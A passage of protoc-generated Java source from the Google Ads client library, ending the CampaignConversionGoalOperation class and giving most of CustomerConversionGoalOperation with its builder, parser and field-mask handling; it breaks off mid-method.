        }
      }
      operationCase_ = 1;
      return this;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     */
    public Builder clearUpdate() {
      if (updateBuilder_ == null) {
        if (operationCase_ == 1) {
          operationCase_ = 0;
          operation_ = null;
          onChanged();
        }
      } else {
        if (operationCase_ == 1) {
          operationCase_ = 0;
          operation_ = null;
        }
        updateBuilder_.clear();
      }
      return this;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     */
    public com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder getUpdateBuilder() {
      return getUpdateFieldBuilder().getBuilder();
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     */
    @java.lang.Override
    public com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() {
      if ((operationCase_ == 1) && (updateBuilder_ != null)) {
        return updateBuilder_.getMessageOrBuilder();
      } else {
        if (operationCase_ == 1) {
          return (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_;
        }
        return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance();
      }
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     */
    private com.google.protobuf.SingleFieldBuilderV3<
        com.google.ads.googleads.v21.resources.CampaignConversionGoal, com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder>
        getUpdateFieldBuilder() {
      if (updateBuilder_ == null) {
        if (!(operationCase_ == 1)) {
          operation_ = com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance();
        }
        updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
            com.google.ads.googleads.v21.resources.CampaignConversionGoal, com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder>(
                (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_,
                getParentForChildren(),
                isClean());
        operation_ = null;
      }
      operationCase_ = 1;
      onChanged();
      return updateBuilder_;
    }
    @java.lang.Override
    public final Builder setUnknownFields(
        final com.google.protobuf.UnknownFieldSet unknownFields) {
      return super.setUnknownFields(unknownFields);
    }

    @java.lang.Override
    public final Builder mergeUnknownFields(
        final com.google.protobuf.UnknownFieldSet unknownFields) {
      return super.mergeUnknownFields(unknownFields);
    }


    // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.services.CampaignConversionGoalOperation)
  }

  // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.services.CampaignConversionGoalOperation)
  private static final com.google.ads.googleads.v21.services.CampaignConversionGoalOperation DEFAULT_INSTANCE;
  static {
    DEFAULT_INSTANCE = new com.google.ads.googleads.v21.services.CampaignConversionGoalOperation();
  }

  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation getDefaultInstance() {
    return DEFAULT_INSTANCE;
  }

  private static final com.google.protobuf.Parser<CampaignConversionGoalOperation>
      PARSER = new com.google.protobuf.AbstractParser<CampaignConversionGoalOperation>() {
    @java.lang.Override
    public CampaignConversionGoalOperation parsePartialFrom(
        com.google.protobuf.CodedInputStream input,
        com.google.protobuf.ExtensionRegistryLite extensionRegistry)
        throws com.google.protobuf.InvalidProtocolBufferException {
      Builder builder = newBuilder();
      try {
        builder.mergeFrom(input, extensionRegistry);
      } catch (com.google.protobuf.InvalidProtocolBufferException e) {
        throw e.setUnfinishedMessage(builder.buildPartial());
      } catch (com.google.protobuf.UninitializedMessageException e) {
        throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial());
      } catch (java.io.IOException e) {
        throw new com.google.protobuf.InvalidProtocolBufferException(e)
            .setUnfinishedMessage(builder.buildPartial());
      }
      return builder.buildPartial();
    }
  };

  public static com.google.protobuf.Parser<CampaignConversionGoalOperation> parser() {
    return PARSER;
  }

  @java.lang.Override
  public com.google.protobuf.Parser<CampaignConversionGoalOperation> getParserForType() {
    return PARSER;
  }

  @java.lang.Override
  public com.google.ads.googleads.v21.services.CampaignConversionGoalOperation getDefaultInstanceForType() {
    return DEFAULT_INSTANCE;
  }

}
googleads/google-ads-java
35,941
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/services/CustomerConversionGoalOperation.java
// Generated by the protocol buffer compiler.  DO NOT EDIT!
// source: google/ads/googleads/v21/services/customer_conversion_goal_service.proto

// Protobuf Java Version: 3.25.7
package com.google.ads.googleads.v21.services;

/**
 * <pre>
 * A single operation (update) on a customer conversion goal.
 * </pre>
 *
 * Protobuf type {@code google.ads.googleads.v21.services.CustomerConversionGoalOperation}
 */
// NOTE(review): machine-generated protoc output. Do not hand-edit the logic;
// regenerate from the .proto instead. The message has one singular field
// (update_mask, #2) and a oneof named `operation` with a single member
// (update, #1).
public final class CustomerConversionGoalOperation extends
    com.google.protobuf.GeneratedMessageV3 implements
    // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.services.CustomerConversionGoalOperation)
    CustomerConversionGoalOperationOrBuilder {
private static final long serialVersionUID = 0L;
  // Use CustomerConversionGoalOperation.newBuilder() to construct.
  private CustomerConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
    super(builder);
  }
  private CustomerConversionGoalOperation() {
  }

  @java.lang.Override
  @SuppressWarnings({"unused"})
  protected java.lang.Object newInstance(
      UnusedPrivateParameter unused) {
    return new CustomerConversionGoalOperation();
  }

  public static final com.google.protobuf.Descriptors.Descriptor
      getDescriptor() {
    return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_descriptor;
  }

  @java.lang.Override
  protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
      internalGetFieldAccessorTable() {
    return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_fieldAccessorTable
        .ensureFieldAccessorsInitialized(
            com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.Builder.class);
  }

  // Bit 0 of bitField0_ records explicit presence of update_mask (field 2).
  private int bitField0_;
  // Discriminator for the `operation` oneof: 1 = update, 0 = not set.
  // operation_ holds the active oneof member's value.
  private int operationCase_ = 0;
  @SuppressWarnings("serial")
  private java.lang.Object operation_;
  public enum OperationCase
      implements com.google.protobuf.Internal.EnumLite,
          com.google.protobuf.AbstractMessage.InternalOneOfEnum {
    UPDATE(1),
    OPERATION_NOT_SET(0);
    private final int value;
    private OperationCase(int value) {
      this.value = value;
    }
    /**
     * @param value The number of the enum to look for.
     * @return The enum associated with the given number.
     * @deprecated Use {@link #forNumber(int)} instead.
     */
    @java.lang.Deprecated
    public static OperationCase valueOf(int value) {
      return forNumber(value);
    }

    public static OperationCase forNumber(int value) {
      switch (value) {
        case 1: return UPDATE;
        case 0: return OPERATION_NOT_SET;
        default: return null;
      }
    }
    public int getNumber() {
      return this.value;
    }
  };

  public OperationCase
  getOperationCase() {
    return OperationCase.forNumber(
        operationCase_);
  }

  public static final int UPDATE_MASK_FIELD_NUMBER = 2;
  private com.google.protobuf.FieldMask updateMask_;
  /**
   * <pre>
   * FieldMask that determines which resource fields are modified in an update.
   * </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   * @return Whether the updateMask field is set.
   */
  @java.lang.Override
  public boolean hasUpdateMask() {
    return ((bitField0_ & 0x00000001) != 0);
  }
  /**
   * <pre>
   * FieldMask that determines which resource fields are modified in an update.
   * </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   * @return The updateMask.
   */
  @java.lang.Override
  public com.google.protobuf.FieldMask getUpdateMask() {
    // Never returns null: falls back to the FieldMask default instance.
    return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
  }
  /**
   * <pre>
   * FieldMask that determines which resource fields are modified in an update.
   * </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   */
  @java.lang.Override
  public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() {
    return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
  }

  public static final int UPDATE_FIELD_NUMBER = 1;
  /**
   * <pre>
   * Update operation: The customer conversion goal is expected to have a
   * valid resource name.
   * </pre>
   *
   * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
   * @return Whether the update field is set.
   */
  @java.lang.Override
  public boolean hasUpdate() {
    return operationCase_ == 1;
  }
  /**
   * <pre>
   * Update operation: The customer conversion goal is expected to have a
   * valid resource name.
   * </pre>
   *
   * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
   * @return The update.
   */
  @java.lang.Override
  public com.google.ads.googleads.v21.resources.CustomerConversionGoal getUpdate() {
    if (operationCase_ == 1) {
       return (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_;
    }
    return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance();
  }
  /**
   * <pre>
   * Update operation: The customer conversion goal is expected to have a
   * valid resource name.
   * </pre>
   *
   * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
   */
  @java.lang.Override
  public com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() {
    if (operationCase_ == 1) {
       return (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_;
    }
    return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance();
  }

  private byte memoizedIsInitialized = -1;
  @java.lang.Override
  public final boolean isInitialized() {
    byte isInitialized = memoizedIsInitialized;
    if (isInitialized == 1) return true;
    if (isInitialized == 0) return false;

    memoizedIsInitialized = 1;
    return true;
  }

  @java.lang.Override
  public void writeTo(com.google.protobuf.CodedOutputStream output)
                      throws java.io.IOException {
    // Wire order: oneof member (field 1) first, then update_mask (field 2),
    // then any unknown fields carried through from parsing.
    if (operationCase_ == 1) {
      output.writeMessage(1, (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_);
    }
    if (((bitField0_ & 0x00000001) != 0)) {
      output.writeMessage(2, getUpdateMask());
    }
    getUnknownFields().writeTo(output);
  }

  @java.lang.Override
  public int getSerializedSize() {
    int size = memoizedSize;
    if (size != -1) return size;

    size = 0;
    if (operationCase_ == 1) {
      size += com.google.protobuf.CodedOutputStream
        .computeMessageSize(1, (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_);
    }
    if (((bitField0_ & 0x00000001) != 0)) {
      size += com.google.protobuf.CodedOutputStream
        .computeMessageSize(2, getUpdateMask());
    }
    size += getUnknownFields().getSerializedSize();
    memoizedSize = size;
    return size;
  }

  @java.lang.Override
  public boolean equals(final java.lang.Object obj) {
    if (obj == this) {
     return true;
    }
    if (!(obj instanceof com.google.ads.googleads.v21.services.CustomerConversionGoalOperation)) {
      return super.equals(obj);
    }
    com.google.ads.googleads.v21.services.CustomerConversionGoalOperation other = (com.google.ads.googleads.v21.services.CustomerConversionGoalOperation) obj;

    if (hasUpdateMask() != other.hasUpdateMask()) return false;
    if (hasUpdateMask()) {
      if (!getUpdateMask()
          .equals(other.getUpdateMask())) return false;
    }
    if (!getOperationCase().equals(other.getOperationCase())) return false;
    switch (operationCase_) {
      case 1:
        if (!getUpdate()
            .equals(other.getUpdate())) return false;
        break;
      case 0:
      default:
    }
    if (!getUnknownFields().equals(other.getUnknownFields())) return false;
    return true;
  }

  @java.lang.Override
  public int hashCode() {
    if (memoizedHashCode != 0) {
      return memoizedHashCode;
    }
    int hash = 41;
    hash = (19 * hash) + getDescriptor().hashCode();
    if (hasUpdateMask()) {
      hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER;
      hash = (53 * hash) + getUpdateMask().hashCode();
    }
    switch (operationCase_) {
      case 1:
        hash = (37 * hash) + UPDATE_FIELD_NUMBER;
        hash = (53 * hash) + getUpdate().hashCode();
        break;
      case 0:
      default:
    }
    hash = (29 * hash) + getUnknownFields().hashCode();
    memoizedHashCode = hash;
    return hash;
  }

  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(
      java.nio.ByteBuffer data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(
      java.nio.ByteBuffer data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(
      com.google.protobuf.ByteString data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(
      com.google.protobuf.ByteString data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(byte[] data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(
      byte[] data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(java.io.InputStream input)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseWithIOException(PARSER, input);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(
      java.io.InputStream input,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseWithIOException(PARSER, input, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseDelimitedFrom(java.io.InputStream input)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseDelimitedWithIOException(PARSER, input);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseDelimitedFrom(
      java.io.InputStream input,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseDelimitedWithIOException(PARSER, input, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(
      com.google.protobuf.CodedInputStream input)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseWithIOException(PARSER, input);
  }
  public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(
      com.google.protobuf.CodedInputStream input,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseWithIOException(PARSER, input, extensionRegistry);
  }

  @java.lang.Override
  public Builder newBuilderForType() { return newBuilder(); }
  public static Builder newBuilder() {
    return DEFAULT_INSTANCE.toBuilder();
  }
  public static Builder newBuilder(com.google.ads.googleads.v21.services.CustomerConversionGoalOperation prototype) {
    return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
  }
  @java.lang.Override
  public Builder toBuilder() {
    return this == DEFAULT_INSTANCE
        ? new Builder() : new Builder().mergeFrom(this);
  }

  @java.lang.Override
  protected Builder newBuilderForType(
      com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
    Builder builder = new Builder(parent);
    return builder;
  }
  /**
   * <pre>
   * A single operation (update) on a customer conversion goal.
   * </pre>
   *
   * Protobuf type {@code google.ads.googleads.v21.services.CustomerConversionGoalOperation}
   */
  public static final class Builder extends
      com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
      // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.services.CustomerConversionGoalOperation)
      com.google.ads.googleads.v21.services.CustomerConversionGoalOperationOrBuilder {
    public static final com.google.protobuf.Descriptors.Descriptor
        getDescriptor() {
      return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_descriptor;
    }

    @java.lang.Override
    protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
        internalGetFieldAccessorTable() {
      return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_fieldAccessorTable
          .ensureFieldAccessorsInitialized(
              com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.Builder.class);
    }

    // Construct using com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.newBuilder()
    private Builder() {
      maybeForceBuilderInitialization();
    }

    private Builder(
        com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
      super(parent);
      maybeForceBuilderInitialization();
    }
    private void maybeForceBuilderInitialization() {
      // Eagerly creates nested field builders only in environments that
      // always use field builders (e.g. when parent notification is needed).
      if (com.google.protobuf.GeneratedMessageV3
              .alwaysUseFieldBuilders) {
        getUpdateMaskFieldBuilder();
      }
    }
    @java.lang.Override
    public Builder clear() {
      super.clear();
      bitField0_ = 0;
      updateMask_ = null;
      if (updateMaskBuilder_ != null) {
        updateMaskBuilder_.dispose();
        updateMaskBuilder_ = null;
      }
      if (updateBuilder_ != null) {
        updateBuilder_.clear();
      }
      operationCase_ = 0;
      operation_ = null;
      return this;
    }

    @java.lang.Override
    public com.google.protobuf.Descriptors.Descriptor
        getDescriptorForType() {
      return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_descriptor;
    }

    @java.lang.Override
    public com.google.ads.googleads.v21.services.CustomerConversionGoalOperation getDefaultInstanceForType() {
      return com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.getDefaultInstance();
    }

    @java.lang.Override
    public com.google.ads.googleads.v21.services.CustomerConversionGoalOperation build() {
      com.google.ads.googleads.v21.services.CustomerConversionGoalOperation result = buildPartial();
      if (!result.isInitialized()) {
        throw newUninitializedMessageException(result);
      }
      return result;
    }

    @java.lang.Override
    public com.google.ads.googleads.v21.services.CustomerConversionGoalOperation buildPartial() {
      com.google.ads.googleads.v21.services.CustomerConversionGoalOperation result = new com.google.ads.googleads.v21.services.CustomerConversionGoalOperation(this);
      if (bitField0_ != 0) { buildPartial0(result); }
      buildPartialOneofs(result);
      onBuilt();
      return result;
    }

    // Copies singular (non-oneof) fields from the builder into `result`.
    private void buildPartial0(com.google.ads.googleads.v21.services.CustomerConversionGoalOperation result) {
      int from_bitField0_ = bitField0_;
      int to_bitField0_ = 0;
      if (((from_bitField0_ & 0x00000001) != 0)) {
        result.updateMask_ = updateMaskBuilder_ == null
            ? updateMask_
            : updateMaskBuilder_.build();
        to_bitField0_ |= 0x00000001;
      }
      result.bitField0_ |= to_bitField0_;
    }

    // Copies the active oneof member (building it if a field builder exists).
    private void buildPartialOneofs(com.google.ads.googleads.v21.services.CustomerConversionGoalOperation result) {
      result.operationCase_ = operationCase_;
      result.operation_ = this.operation_;
      if (operationCase_ == 1 &&
          updateBuilder_ != null) {
        result.operation_ = updateBuilder_.build();
      }
    }

    @java.lang.Override
    public Builder clone() {
      return super.clone();
    }
    @java.lang.Override
    public Builder setField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        java.lang.Object value) {
      return super.setField(field, value);
    }
    @java.lang.Override
    public Builder clearField(
        com.google.protobuf.Descriptors.FieldDescriptor field) {
      return super.clearField(field);
    }
    @java.lang.Override
    public Builder clearOneof(
        com.google.protobuf.Descriptors.OneofDescriptor oneof) {
      return super.clearOneof(oneof);
    }
    @java.lang.Override
    public Builder setRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        int index, java.lang.Object value) {
      return super.setRepeatedField(field, index, value);
    }
    @java.lang.Override
    public Builder addRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        java.lang.Object value) {
      return super.addRepeatedField(field, value);
    }
    @java.lang.Override
    public Builder mergeFrom(com.google.protobuf.Message other) {
      if (other instanceof com.google.ads.googleads.v21.services.CustomerConversionGoalOperation) {
        return mergeFrom((com.google.ads.googleads.v21.services.CustomerConversionGoalOperation)other);
      } else {
        super.mergeFrom(other);
        return this;
      }
    }

    public Builder mergeFrom(com.google.ads.googleads.v21.services.CustomerConversionGoalOperation other) {
      if (other == com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.getDefaultInstance()) return this;
      if (other.hasUpdateMask()) {
        mergeUpdateMask(other.getUpdateMask());
      }
      switch (other.getOperationCase()) {
        case UPDATE: {
          mergeUpdate(other.getUpdate());
          break;
        }
        case OPERATION_NOT_SET: {
          break;
        }
      }
      this.mergeUnknownFields(other.getUnknownFields());
      onChanged();
      return this;
    }

    @java.lang.Override
    public final boolean isInitialized() {
      return true;
    }

    @java.lang.Override
    public Builder mergeFrom(
        com.google.protobuf.CodedInputStream input,
        com.google.protobuf.ExtensionRegistryLite extensionRegistry)
        throws java.io.IOException {
      if (extensionRegistry == null) {
        throw new java.lang.NullPointerException();
      }
      try {
        boolean done = false;
        while (!done) {
          int tag = input.readTag();
          switch (tag) {
            case 0:
              done = true;
              break;
            case 10: {
              // Wire tag 10 = field 1 (update), length-delimited.
              input.readMessage(
                  getUpdateFieldBuilder().getBuilder(),
                  extensionRegistry);
              operationCase_ = 1;
              break;
            } // case 10
            case 18: {
              // Wire tag 18 = field 2 (update_mask), length-delimited.
              input.readMessage(
                  getUpdateMaskFieldBuilder().getBuilder(),
                  extensionRegistry);
              bitField0_ |= 0x00000001;
              break;
            } // case 18
            default: {
              if (!super.parseUnknownField(input, extensionRegistry, tag)) {
                done = true; // was an endgroup tag
              }
              break;
            } // default:
          } // switch (tag)
        } // while (!done)
      } catch (com.google.protobuf.InvalidProtocolBufferException e) {
        throw e.unwrapIOException();
      } finally {
        onChanged();
      } // finally
      return this;
    }
    private int operationCase_ = 0;
    private java.lang.Object operation_;
    public OperationCase
        getOperationCase() {
      return OperationCase.forNumber(
          operationCase_);
    }

    public Builder clearOperation() {
      operationCase_ = 0;
      operation_ = null;
      onChanged();
      return this;
    }

    private int bitField0_;

    private com.google.protobuf.FieldMask updateMask_;
    private com.google.protobuf.SingleFieldBuilderV3<
        com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_;
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     * @return Whether the updateMask field is set.
     */
    public boolean hasUpdateMask() {
      return ((bitField0_ & 0x00000001) != 0);
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     * @return The updateMask.
     */
    public com.google.protobuf.FieldMask getUpdateMask() {
      if (updateMaskBuilder_ == null) {
        return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
      } else {
        return updateMaskBuilder_.getMessage();
      }
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder setUpdateMask(com.google.protobuf.FieldMask value) {
      if (updateMaskBuilder_ == null) {
        if (value == null) {
          throw new NullPointerException();
        }
        updateMask_ = value;
      } else {
        updateMaskBuilder_.setMessage(value);
      }
      bitField0_ |= 0x00000001;
      onChanged();
      return this;
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder setUpdateMask(
        com.google.protobuf.FieldMask.Builder builderForValue) {
      if (updateMaskBuilder_ == null) {
        updateMask_ = builderForValue.build();
      } else {
        updateMaskBuilder_.setMessage(builderForValue.build());
      }
      bitField0_ |= 0x00000001;
      onChanged();
      return this;
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) {
      // Merges into an existing mask if one is already set; otherwise replaces.
      if (updateMaskBuilder_ == null) {
        if (((bitField0_ & 0x00000001) != 0) &&
          updateMask_ != null &&
          updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) {
          getUpdateMaskBuilder().mergeFrom(value);
        } else {
          updateMask_ = value;
        }
      } else {
        updateMaskBuilder_.mergeFrom(value);
      }
      if (updateMask_ != null) {
        bitField0_ |= 0x00000001;
        onChanged();
      }
      return this;
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder clearUpdateMask() {
      bitField0_ = (bitField0_ & ~0x00000001);
      updateMask_ = null;
      if (updateMaskBuilder_ != null) {
        updateMaskBuilder_.dispose();
        updateMaskBuilder_ = null;
      }
      onChanged();
      return this;
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() {
      // Marks the field present: obtaining the builder counts as setting it.
      bitField0_ |= 0x00000001;
      onChanged();
      return getUpdateMaskFieldBuilder().getBuilder();
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() {
      if (updateMaskBuilder_ != null) {
        return updateMaskBuilder_.getMessageOrBuilder();
      } else {
        return updateMask_ == null ?
            com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
      }
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    private com.google.protobuf.SingleFieldBuilderV3<
        com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>
        getUpdateMaskFieldBuilder() {
      // Lazily transfers ownership of updateMask_ into a field builder.
      if (updateMaskBuilder_ == null) {
        updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
            com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>(
                getUpdateMask(),
                getParentForChildren(),
                isClean());
        updateMask_ = null;
      }
      return updateMaskBuilder_;
    }

    private com.google.protobuf.SingleFieldBuilderV3<
        com.google.ads.googleads.v21.resources.CustomerConversionGoal, com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder> updateBuilder_;
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     * @return Whether the update field is set.
     */
    @java.lang.Override
    public boolean hasUpdate() {
      return operationCase_ == 1;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     * @return The update.
     */
    @java.lang.Override
    public com.google.ads.googleads.v21.resources.CustomerConversionGoal getUpdate() {
      if (updateBuilder_ == null) {
        if (operationCase_ == 1) {
          return (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_;
        }
        return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance();
      } else {
        if (operationCase_ == 1) {
          return updateBuilder_.getMessage();
        }
        return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance();
      }
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     */
    public Builder setUpdate(com.google.ads.googleads.v21.resources.CustomerConversionGoal value) {
      if (updateBuilder_ == null) {
        if (value == null) {
          throw new NullPointerException();
        }
        operation_ = value;
        onChanged();
      } else {
        updateBuilder_.setMessage(value);
      }
      operationCase_ = 1;
      return this;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     */
    public Builder setUpdate(
        com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder builderForValue) {
      if (updateBuilder_ == null) {
        operation_ = builderForValue.build();
        onChanged();
      } else {
        updateBuilder_.setMessage(builderForValue.build());
      }
      operationCase_ = 1;
      return this;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code>
     */
    public Builder mergeUpdate(com.google.ads.googleads.v21.resources.CustomerConversionGoal value) {
      // Only merges when this oneof member is already the active case;
